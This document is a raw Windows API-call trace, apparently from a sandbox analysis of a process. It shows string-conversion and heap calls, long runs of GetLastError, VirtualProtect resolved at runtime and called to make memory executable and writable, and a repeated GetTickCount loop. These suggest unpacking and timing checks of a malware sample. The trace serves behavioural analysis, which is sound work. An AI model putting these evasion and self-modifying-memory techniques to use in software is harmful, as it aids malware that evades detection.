¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0105.048] HeapValidate (hHeap=0xa80000, dwFlags=0x0, lpMem=0xa81778) returned 1 [0105.048] HeapFree (in: hHeap=0xa80000, dwFlags=0x0, lpMem=0xa81778 | out: hHeap=0xa80000) returned 1 [0105.048] HeapValidate (hHeap=0xa80000, dwFlags=0x0, lpMem=0xa81540) returned 1 [0105.049] HeapFree (in: hHeap=0xa80000, dwFlags=0x0, lpMem=0xa81540 | out: hHeap=0xa80000) returned 1 [0105.049] GetLastError () returned 0x0 [0105.200] SetLastError (dwErrCode=0x0) [0105.203] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f92c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0105.216] RtlAllocateHeap (HeapHandle=0xa80000, Flags=0x0, Size=0x22c) returned 0xa81540 [0105.219] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f92c, cbMultiByte=256, lpWideCharStr=0xa81568, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽\\\灪∆) returned 256 [0105.219] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽\\\灪∆, cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0105.220] RtlAllocateHeap (HeapHandle=0xa80000, Flags=0x0, Size=0x22c) returned 0xa81778 [0105.221] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽\\\狝煪䀌ꠕ∀, cchSrc=256, lpDestStr=0xa817a0, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ﷽﷽\\\䳝灪∆) returned 256 [0105.221] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ﷽﷽\\\䳝灪∆, cchWideChar=256, lpMultiByteStr=0x18fa34, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0105.222] HeapValidate (hHeap=0xa80000, dwFlags=0x0, lpMem=0xa81778) returned 1 [0105.222] HeapFree (in: hHeap=0xa80000, dwFlags=0x0, lpMem=0xa81778 | out: hHeap=0xa80000) returned 1 [0105.223] HeapValidate (hHeap=0xa80000, dwFlags=0x0, lpMem=0xa81540) returned 1 [0105.226] HeapFree (in: hHeap=0xa80000, dwFlags=0x0, lpMem=0xa81540 | out: hHeap=0xa80000) returned 1 [0105.229] RtlAllocateHeap (HeapHandle=0xa80000, Flags=0x0, Size=0x824) returned 0xa81540 [0105.235] HeapValidate (hHeap=0xa80000, dwFlags=0x0, lpMem=0xa81240) returned 1 [0105.241] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x430c10) returned 0x0 [0105.363] HeapValidate (hHeap=0xa80000, dwFlags=0x0, lpMem=0xa81240) returned 1 [0105.363] HeapValidate (hHeap=0xa80000, dwFlags=0x0, lpMem=0xa81240) returned 1 [0105.363] HeapValidate (hHeap=0xa80000, dwFlags=0x0, lpMem=0xa81240) returned 1 [0105.364] HeapValidate (hHeap=0xa80000, dwFlags=0x0, lpMem=0xa81240) returned 1 [0105.370] HeapValidate (hHeap=0xa80000, dwFlags=0x0, lpMem=0xa81240) returned 1 [0105.370] HeapValidate (hHeap=0xa80000, dwFlags=0x0, lpMem=0xa81240) returned 1 [0105.370] HeapValidate (hHeap=0xa80000, dwFlags=0x0, lpMem=0xa81240) returned 1 [0105.371] HeapValidate (hHeap=0xa80000, dwFlags=0x0, lpMem=0xa81240) returned 1 [0105.371] HeapValidate (hHeap=0xa80000, dwFlags=0x0, lpMem=0xa81240) returned 1 [0105.371] GetLastError () returned 0x0 [0105.371] GetLastError () returned 0x0 [0105.371] GetLastError () returned 0x0 [0105.371] GetLastError () returned 0x0 [0105.371] GetLastError () returned 0x0 [0105.371] GetLastError () returned 0x0 [0105.371] GetLastError () returned 0x0 [0105.371] GetLastError () returned 0x0 [0105.371] GetLastError () returned 0x0 [0105.371] GetLastError () returned 0x0 [0105.371] GetLastError () returned 0x0 [0105.371] GetLastError () returned 0x0 [0105.372] GetLastError () returned 0x0 [0105.372] GetLastError () returned 0x0 [0105.372] GetLastError () returned 0x0 [0105.372] GetLastError () returned 0x0 [0105.372] GetLastError () returned 0x0 [0105.372] GetLastError () returned 0x0 [0105.372] GetLastError () returned 0x0 [0105.372] GetLastError () returned 0x0 [0105.372] GetLastError () returned 0x0 [0105.372] GetLastError () returned 0x0 [0105.372] GetLastError () returned 0x0 [0105.372] GetLastError () returned 0x0 [0105.372] GetLastError () returned 0x0 [0105.372] GetLastError () returned 0x0 [0105.372] GetLastError () returned 0x0 [0105.372] GetLastError () returned 0x0 [0105.372] GetLastError () returned 0x0 [0105.372] GetLastError () returned 0x0 [0105.372] GetLastError () returned 0x0 [0105.372] GetLastError () returned 0x0 [0105.372] GetLastError () returned 0x0 [0105.372] GetLastError () returned 0x0 [0105.372] GetLastError () returned 0x0 [0105.372] GetLastError () returned 0x0 [0105.372] GetLastError () returned 0x0 [0105.372] GetLastError () returned 0x0 [0105.372] GetLastError () returned 0x0 [0105.372] GetLastError () returned 0x0 [0105.372] GetLastError () returned 0x0 [0105.372] GetLastError () returned 0x0 [0105.372] GetLastError () returned 0x0 [0105.372] GetLastError () returned 0x0 [0105.372] GetLastError () returned 0x0 [0105.372] GetLastError () returned 0x0 [0105.372] GetLastError () returned 0x0 [0105.372] GetLastError () returned 0x0 [0105.372] GetLastError () returned 0x0 [0105.372] GetLastError () returned 0x0 [0105.372] GetLastError () returned 0x0 [0105.372] GetLastError () returned 0x0 [0105.373] GetLastError () returned 0x0 [0105.373] GetLastError () returned 0x0 [0105.373] GetLastError () returned 0x0 [0105.373] GetLastError () returned 0x0 [0105.373] GetLastError () returned 0x0 [0105.373] GetLastError () returned 0x0 [0105.373] GetLastError () returned 0x0 [0105.373] GetLastError () returned 0x0 [0105.373] GetLastError () returned 0x0 [0105.373] GetLastError () returned 0x0 [0105.373] GetLastError () returned 0x0 [0105.373] GetLastError () returned 0x0 [0105.373] GetLastError () returned 0x0 [0105.373] GetLastError () returned 0x0 [0105.373] GetLastError () returned 0x0 [0105.373] GetLastError () returned 0x0 [0105.373] GetLastError () returned 0x0 [0105.373] GetLastError () returned 0x0 [0105.373] GetLastError () returned 0x0 [0105.373] GetLastError () returned 0x0 [0105.373] GetLastError () returned 0x0 [0105.373] GetLastError () returned 0x0 [0105.373] GetLastError () returned 0x0 [0105.373] GetLastError () returned 0x0 [0105.373] GetLastError () returned 0x0 [0105.373] GetLastError () returned 0x0 [0105.373] GetLastError () returned 0x0 [0105.373] GetLastError () returned 0x0 [0105.373] GetLastError () returned 0x0 [0105.373] GetLastError () returned 0x0 [0105.373] GetLastError () returned 0x0 [0105.373] GetLastError () returned 0x0 [0105.373] GetLastError () returned 0x0 [0105.373] GetLastError () returned 0x0 [0105.373] GetLastError () returned 0x0 [0105.373] GetLastError () returned 0x0 [0105.373] GetLastError () returned 0x0 [0105.373] GetLastError () returned 0x0 [0105.373] GetLastError () returned 0x0 [0105.373] GetLastError () returned 0x0 [0105.374] GetLastError () returned 0x0 [0105.374] GetLastError () returned 0x0 [0105.374] GetLastError () returned 0x0 [0105.374] GetLastError () returned 0x0 [0105.374] GetLastError () returned 0x0 [0105.374] GetLastError () returned 0x0 [0105.374] GetLastError () returned 0x0 [0105.374] GetLastError () returned 0x0 [0105.374] GetLastError () returned 0x0 [0105.374] GetLastError () returned 0x0 [0105.374] GetLastError () returned 0x0 [0105.374] GetLastError () returned 0x0 [0105.374] GetLastError () returned 0x0 [0105.374] GetLastError () returned 0x0 [0105.374] GetLastError () returned 0x0 [0105.374] GetLastError () returned 0x0 [0105.374] GetLastError () returned 0x0 [0105.374] GetLastError () returned 0x0 [0105.374] GetLastError () returned 0x0 [0105.374] GetLastError () returned 0x0 [0105.374] GetLastError () returned 0x0 [0105.374] GetLastError () returned 0x0 [0105.374] GetLastError () returned 0x0 [0105.374] GetLastError () returned 0x0 [0105.374] GetLastError () returned 0x0 [0105.374] GetLastError () returned 0x0 [0105.374] GetLastError () returned 0x0 [0105.374] GetLastError () returned 0x0 [0105.374] GetLastError () returned 0x0 [0105.374] GetLastError () returned 0x0 [0105.374] GetLastError () returned 0x0 [0105.374] GetLastError () returned 0x0 [0105.374] GetLastError () returned 0x0 [0105.374] GetLastError () returned 0x0 [0105.374] GetLastError () returned 0x0 [0105.374] GetLastError () returned 0x0 [0105.374] GetLastError () returned 0x0 [0105.374] GetLastError () returned 0x0 [0105.374] GetLastError () returned 0x0 [0105.374] GetLastError () returned 0x0 [0105.375] GetLastError () returned 0x0 [0105.375] GetLastError () returned 0x0 [0105.375] GetLastError () returned 0x0 [0105.375] GetLastError () returned 0x0 [0105.375] GetLastError () returned 0x0 [0105.375] GetLastError () returned 0x0 [0105.375] GetLastError () returned 0x0 [0105.375] GetLastError () returned 0x0 [0105.375] GetLastError () returned 0x0 [0105.375] GetLastError () returned 0x0 [0105.375] GetLastError () returned 0x0 [0105.375] GetLastError () returned 0x0 [0105.375] GetLastError () returned 0x0 [0105.375] GetLastError () returned 0x0 [0105.375] GetLastError () returned 0x0 [0105.375] GetLastError () returned 0x0 [0105.375] GetLastError () returned 0x0 [0105.375] GetLastError () returned 0x0 [0105.375] GetLastError () returned 0x0 [0105.375] GetLastError () returned 0x0 [0105.375] GetLastError () returned 0x0 [0105.375] GetLastError () returned 0x0 [0105.375] GetLastError () returned 0x0 [0105.375] GetLastError () returned 0x0 [0105.375] GetLastError () returned 0x0 [0105.375] GetLastError () returned 0x0 [0105.375] GetLastError () returned 0x0 [0105.375] GetLastError () returned 0x0 [0105.375] GetLastError () returned 0x0 [0105.375] GetLastError () returned 0x0 [0105.375] GetLastError () returned 0x0 [0105.375] GetLastError () returned 0x0 [0105.375] GetLastError () returned 0x0 [0105.375] GetLastError () returned 0x0 [0105.375] GetLastError () returned 0x0 [0105.375] GetLastError () returned 0x0 [0105.375] GetLastError () returned 0x0 [0105.375] GetLastError () returned 0x0 [0105.375] GetLastError () returned 0x0 [0105.375] GetLastError () returned 0x0 [0105.375] GetLastError () returned 0x0 [0105.376] GetLastError () returned 0x0 [0105.376] GetLastError () returned 0x0 [0105.376] GetLastError () returned 0x0 [0105.376] GetLastError () returned 0x0 [0105.376] GetLastError () returned 0x0 [0105.376] GetLastError () returned 0x0 [0105.376] GetLastError () returned 0x0 [0105.376] GetLastError () returned 0x0 [0105.376] GetLastError () returned 0x0 [0105.376] GetLastError () returned 0x0 [0105.376] GetLastError () returned 0x0 [0105.376] GetLastError () returned 0x0 [0105.376] GetLastError () returned 0x0 [0105.376] GetLastError () returned 0x0 [0105.376] GetLastError () returned 0x0 [0105.376] GetLastError () returned 0x0 [0105.376] GetLastError () returned 0x0 [0105.376] GetLastError () returned 0x0 [0105.376] GetLastError () returned 0x0 [0105.376] GetLastError () returned 0x0 [0105.376] GetLastError () returned 0x0 [0105.376] GetLastError () returned 0x0 [0105.376] GetLastError () returned 0x0 [0105.376] GetLastError () returned 0x0 [0105.376] GetLastError () returned 0x0 [0105.376] GetLastError () returned 0x0 [0105.376] GetLastError () returned 0x0 [0105.376] GetLastError () returned 0x0 [0105.376] GetLastError () returned 0x0 [0105.376] GetLastError () returned 0x0 [0105.376] GetLastError () returned 0x0 [0105.376] GetLastError () returned 0x0 [0105.376] GetLastError () returned 0x0 [0105.376] GetLastError () returned 0x0 [0105.376] GetLastError () returned 0x0 [0105.376] GetLastError () returned 0x0 [0105.376] GetLastError () returned 0x0 [0105.376] GetLastError () returned 0x0 [0105.376] GetLastError () returned 0x0 [0105.376] GetLastError () returned 0x0 [0105.376] GetLastError () returned 0x0 [0105.376] GetLastError () returned 0x0 [0105.376] GetLastError () returned 0x0 [0105.377] GetLastError () returned 0x0 [0105.377] GetLastError () returned 0x0 [0105.377] GetLastError () returned 0x0 [0105.377] GetLastError () returned 0x0 [0105.377] GetLastError () returned 0x0 [0105.377] GetLastError () returned 0x0 [0105.377] GetLastError () returned 0x0 [0105.377] GetLastError () returned 0x0 [0105.377] GetLastError () returned 0x0 [0105.377] GetLastError () returned 0x0 [0105.377] GetLastError () returned 0x0 [0105.377] GetLastError () returned 0x0 [0105.377] GetLastError () returned 0x0 [0105.377] GetLastError () returned 0x0 [0105.377] GetLastError () returned 0x0 [0105.377] GetLastError () returned 0x0 [0105.377] GetLastError () returned 0x0 [0105.377] GetLastError () returned 0x0 [0105.377] GetLastError () returned 0x0 [0105.377] GetLastError () returned 0x0 [0105.377] GetLastError () returned 0x0 [0105.377] GetLastError () returned 0x0 [0105.377] GetLastError () returned 0x0 [0105.377] GetLastError () returned 0x0 [0105.377] GetLastError () returned 0x0 [0105.377] GetLastError () returned 0x0 [0105.377] GetLastError () returned 0x0 [0105.377] GetLastError () returned 0x0 [0105.377] GetLastError () returned 0x0 [0105.377] GetLastError () returned 0x0 [0105.377] GetLastError () returned 0x0 [0105.377] GetLastError () returned 0x0 [0105.377] GetLastError () returned 0x0 [0109.876] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x769b0000 [0109.876] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualProtect") returned 0x769c4317 [0109.876] VirtualProtect (in: lpAddress=0x81f228, dwSize=0xf520, flNewProtect=0x40, lpflOldProtect=0x18dc9c | out: lpflOldProtect=0x18dc9c*=0x4) returned 1 [0109.883] GetTickCount () returned 0xf78c7b [0109.883] SetLastError (dwErrCode=0x0) [0109.883] GetTickCount () returned 0xf78c7b [0109.883] SetLastError (dwErrCode=0x0) [0109.883] GetTickCount () returned 0xf78c7b [0109.883] SetLastError (dwErrCode=0x0) [0109.883] GetTickCount () returned 0xf78c7b [0109.883] SetLastError (dwErrCode=0x0) [0109.883] GetTickCount () returned 0xf78c7b [0109.883] SetLastError (dwErrCode=0x0) [0109.883] GetTickCount () returned 0xf78c7b [0109.883] SetLastError (dwErrCode=0x0) [0109.883] GetTickCount () returned 0xf78c7b [0109.883] SetLastError (dwErrCode=0x0) [0109.883] GetTickCount () returned 0xf78c7b [0109.883] SetLastError (dwErrCode=0x0) [0109.883] GetTickCount () returned 0xf78c7b [0109.883] SetLastError (dwErrCode=0x0) [0109.883] GetTickCount () returned 0xf78c7b [0109.883] SetLastError (dwErrCode=0x0) [0109.883] GetTickCount () returned 0xf78c7b [0109.884] SetLastError (dwErrCode=0x0) [0109.884] GetTickCount () returned 0xf78c7b [0109.884] SetLastError (dwErrCode=0x0) [0109.884] GetTickCount () returned 0xf78c7b [0109.884] SetLastError (dwErrCode=0x0) [0109.884] GetTickCount () returned 0xf78c7b [0109.884] SetLastError (dwErrCode=0x0) [0109.884] GetTickCount () returned 0xf78c7b [0109.884] SetLastError (dwErrCode=0x0) [0109.884] GetTickCount () returned 0xf78c7b [0109.884] SetLastError (dwErrCode=0x0) [0109.884] GetTickCount () returned 0xf78c7b [0109.884] SetLastError (dwErrCode=0x0) [0109.884] GetTickCount () returned 0xf78c7b [0109.884] SetLastError (dwErrCode=0x0) [0109.884] GetTickCount () returned 0xf78c7b [0109.884] SetLastError (dwErrCode=0x0) [0109.884] GetTickCount () returned 0xf78c7b [0109.884] SetLastError (dwErrCode=0x0) [0109.884] GetTickCount () returned 0xf78c7b [0109.884] SetLastError (dwErrCode=0x0) [0109.884] GetTickCount () returned 0xf78c7b [0109.884] SetLastError (dwErrCode=0x0) [0109.884] GetTickCount () returned 0xf78c7b [0109.884] SetLastError (dwErrCode=0x0) [0109.884] GetTickCount () returned 0xf78c7b [0109.884] SetLastError (dwErrCode=0x0) [0109.884] GetTickCount () returned 0xf78c7b [0109.884] SetLastError (dwErrCode=0x0) [0109.884] GetTickCount () returned 0xf78c7b [0109.884] SetLastError (dwErrCode=0x0) [0109.884] GetTickCount () returned 0xf78c7b [0109.884] SetLastError (dwErrCode=0x0) [0109.884] GetTickCount () returned 0xf78c7b [0109.884] SetLastError (dwErrCode=0x0) [0109.884] GetTickCount () returned 0xf78c7b [0109.884] SetLastError (dwErrCode=0x0) [0109.884] GetTickCount () returned 0xf78c7b [0109.884] SetLastError (dwErrCode=0x0) [0109.884] GetTickCount () returned 0xf78c7b [0109.884] SetLastError (dwErrCode=0x0) [0109.884] GetTickCount () returned 0xf78c7b [0109.885] SetLastError (dwErrCode=0x0) [0109.885] GetTickCount () returned 0xf78c7b [0109.885] SetLastError (dwErrCode=0x0) [0109.885] GetTickCount () returned 0xf78c7b [0109.885] SetLastError (dwErrCode=0x0) [0109.885] GetTickCount () returned 0xf78c7b [0109.885] SetLastError (dwErrCode=0x0) [0109.885] GetTickCount () returned 0xf78c7b [0109.885] SetLastError (dwErrCode=0x0) [0109.885] GetTickCount () returned 0xf78c7b [0109.885] SetLastError (dwErrCode=0x0) [0109.885] GetTickCount () returned 0xf78c7b [0109.885] SetLastError (dwErrCode=0x0) [0109.885] GetTickCount () returned 0xf78c7b [0109.885] SetLastError (dwErrCode=0x0) [0109.885] GetTickCount () returned 0xf78c7b [0109.885] SetLastError (dwErrCode=0x0) [0109.885] GetTickCount () returned 0xf78c7b [0109.885] SetLastError (dwErrCode=0x0) [0109.885] GetTickCount () returned 0xf78c7b [0109.885] SetLastError (dwErrCode=0x0) [0109.885] GetTickCount () returned 0xf78c7b [0109.885] SetLastError (dwErrCode=0x0) [0109.885] GetTickCount () returned 0xf78c7b [0109.885] SetLastError (dwErrCode=0x0) [0109.885] GetTickCount () returned 0xf78c7b [0109.885] SetLastError (dwErrCode=0x0) [0109.885] GetTickCount () returned 0xf78c7b [0109.885] SetLastError (dwErrCode=0x0) [0109.885] GetTickCount () returned 0xf78c7b [0109.885] SetLastError (dwErrCode=0x0) [0109.885] GetTickCount () returned 0xf78c7b [0109.885] SetLastError (dwErrCode=0x0) [0109.885] GetTickCount () returned 0xf78c7b [0109.885] SetLastError (dwErrCode=0x0) [0109.885] GetTickCount () returned 0xf78c7b [0109.885] SetLastError (dwErrCode=0x0) [0109.885] GetTickCount () returned 0xf78c7b [0109.885] SetLastError (dwErrCode=0x0) [0109.885] GetTickCount () returned 0xf78c7b [0109.885] SetLastError (dwErrCode=0x0) [0109.885] GetTickCount () returned 0xf78c7b [0109.885] SetLastError (dwErrCode=0x0) [0109.886] GetTickCount () returned 0xf78c7b [0109.886] SetLastError (dwErrCode=0x0) [0109.886] GetTickCount () returned 0xf78c7b [0109.886] SetLastError (dwErrCode=0x0) [0109.886] GetTickCount () returned 0xf78c7b [0109.886] SetLastError (dwErrCode=0x0) [0109.886] GetTickCount () returned 0xf78c7b [0109.886] SetLastError (dwErrCode=0x0) [0109.886] GetTickCount () returned 0xf78c7b [0109.886] SetLastError (dwErrCode=0x0) [0109.886] GetTickCount () returned 0xf78c7b [0109.886] SetLastError (dwErrCode=0x0) [0109.886] GetTickCount () returned 0xf78c7b [0109.886] SetLastError (dwErrCode=0x0) [0109.886] GetTickCount () returned 0xf78c7b [0109.886] SetLastError (dwErrCode=0x0) [0109.886] GetTickCount () returned 0xf78c7b [0109.886] SetLastError (dwErrCode=0x0) [0109.886] GetTickCount () returned 0xf78c7b [0109.886] SetLastError (dwErrCode=0x0) [0109.886] GetTickCount () returned 0xf78c7b [0109.886] SetLastError (dwErrCode=0x0) [0109.886] GetTickCount () returned 0xf78c7b [0109.886] SetLastError (dwErrCode=0x0) [0109.886] GetTickCount () returned 0xf78c7b [0109.886] SetLastError (dwErrCode=0x0) [0109.886] GetTickCount () returned 0xf78c7b [0109.886] SetLastError (dwErrCode=0x0) [0109.886] GetTickCount () returned 0xf78c7b [0109.886] SetLastError (dwErrCode=0x0) [0109.886] GetTickCount () returned 0xf78c7b [0109.886] SetLastError (dwErrCode=0x0) [0109.886] GetTickCount () returned 0xf78c7b [0109.886] SetLastError (dwErrCode=0x0) [0109.886] GetTickCount () returned 0xf78c7b [0109.886] SetLastError (dwErrCode=0x0) [0109.886] GetTickCount () returned 0xf78c7b [0109.886] SetLastError (dwErrCode=0x0) [0109.886] GetTickCount () returned 0xf78c7b [0109.886] SetLastError (dwErrCode=0x0) [0109.886] GetTickCount () returned 0xf78c7b [0109.886] SetLastError (dwErrCode=0x0) [0109.887] GetTickCount () returned 0xf78c7b [0109.887] SetLastError (dwErrCode=0x0) [0109.887] GetTickCount () returned 0xf78c7b [0109.887] SetLastError (dwErrCode=0x0) [0109.887] GetTickCount () returned 0xf78c7b [0109.887] SetLastError (dwErrCode=0x0) [0109.887] GetTickCount () returned 0xf78c7b [0109.887] SetLastError (dwErrCode=0x0) [0109.887] GetTickCount () returned 0xf78c7b [0109.887] SetLastError (dwErrCode=0x0) [0109.887] GetTickCount () returned 0xf78c7b [0109.887] SetLastError (dwErrCode=0x0) [0109.887] GetTickCount () returned 0xf78c7b [0109.887] SetLastError (dwErrCode=0x0) [0109.887] GetTickCount () returned 0xf78c7b 